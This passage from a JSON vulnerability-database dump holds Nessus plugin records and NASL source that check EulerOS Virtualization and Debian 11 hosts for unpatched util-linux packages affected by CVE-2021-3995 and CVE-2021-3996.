audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.2-2.h23.eulerosv2r10\",\n \"libfdisk-2.35.2-2.h23.eulerosv2r10\",\n \"libmount-2.35.2-2.h23.eulerosv2r10\",\n \"libsmartcols-2.35.2-2.h23.eulerosv2r10\",\n \"libuuid-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-user-2.35.2-2.h23.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-01T15:23:00", "description": "According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-05T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.1 : util-linux (EulerOS-SA-2022-1616)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-31T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:uvp:2.9.1"], "id": "EULEROS_SA-2022-1616.NASL", "href": "https://www.tenable.com/plugins/nessus/160587", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160587);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/31\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS Virtualization 2.9.1 : util-linux (EulerOS-SA-2022-1616)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. 
This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe8cf37\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-01T15:24:18", "description": "According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A logic 
error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-05T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.0 : util-linux (EulerOS-SA-2022-1640)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:uvp:2.9.0"], "id": "EULEROS_SA-2022-1640.NASL", "href": "https://www.tenable.com/plugins/nessus/160591", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160591);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/30\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS Virtualization 2.9.0 : util-linux (EulerOS-SA-2022-1640)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. 
(CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1640\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2f588c82\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n 
\"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-19T14:39:46", "description": "The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the dsa-5055 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. 
(CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-01-31T00:00:00", "type": "nessus", "title": "Debian DSA-5055-1 : util-linux - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bsdextrautils", "p-cpe:/a:debian:debian_linux:bsdutils", "p-cpe:/a:debian:debian_linux:eject", "p-cpe:/a:debian:debian_linux:eject-udeb", "p-cpe:/a:debian:debian_linux:fdisk", "p-cpe:/a:debian:debian_linux:fdisk-udeb", "p-cpe:/a:debian:debian_linux:libblkid-dev", "p-cpe:/a:debian:debian_linux:libblkid1", "p-cpe:/a:debian:debian_linux:libblkid1-udeb", "p-cpe:/a:debian:debian_linux:libfdisk-dev", "p-cpe:/a:debian:debian_linux:libfdisk1", "p-cpe:/a:debian:debian_linux:libfdisk1-udeb", "p-cpe:/a:debian:debian_linux:libmount-dev", "p-cpe:/a:debian:debian_linux:libmount1", "p-cpe:/a:debian:debian_linux:libmount1-udeb", "p-cpe:/a:debian:debian_linux:libsmartcols-dev", "p-cpe:/a:debian:debian_linux:libsmartcols1", "p-cpe:/a:debian:debian_linux:libsmartcols1-udeb", "p-cpe:/a:debian:debian_linux:libuuid1", "p-cpe:/a:debian:debian_linux:libuuid1-udeb", "p-cpe:/a:debian:debian_linux:mount", "p-cpe:/a:debian:debian_linux:rfkill", "p-cpe:/a:debian:debian_linux:util-linux", "p-cpe:/a:debian:debian_linux:util-linux-locales", "p-cpe:/a:debian:debian_linux:util-linux-udeb", "p-cpe:/a:debian:debian_linux:uuid-dev", "p-cpe:/a:debian:debian_linux:uuid-runtime", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5055.NASL", "href": "https://www.tenable.com/plugins/nessus/157263", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5055. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157263);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/17\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"Debian DSA-5055-1 : util-linux - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndsa-5055 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. 
(CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/util-linux\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5055\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-3995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-3996\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/util-linux\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the util-linux packages.\n\nFor the stable distribution (bullseye), these problems have been fixed in version 2.36.1-8+deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bsdextrautils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bsdutils\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eject\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eject-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fdisk-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libblkid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libblkid1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfdisk-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfdisk1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmount-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmount1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmartcols-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmartcols1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuuid1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rfkill\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:util-linux\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:util-linux-locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:util-linux-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:uuid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:uuid-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! 
preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'bsdextrautils', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'bsdutils', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'eject', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'eject-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'fdisk', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'fdisk-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libblkid-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libblkid1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libblkid1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libfdisk-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libfdisk1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libfdisk1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libmount-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libmount1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libmount1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libsmartcols-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libsmartcols1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libsmartcols1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libuuid1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libuuid1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'mount', 
'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'rfkill', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'util-linux', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'util-linux-locales', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'util-linux-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'uuid-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'uuid-runtime', 'reference': '2.36.1-8+deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bsdextrautils / bsdutils / eject / eject-udeb / fdisk / fdisk-udeb / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 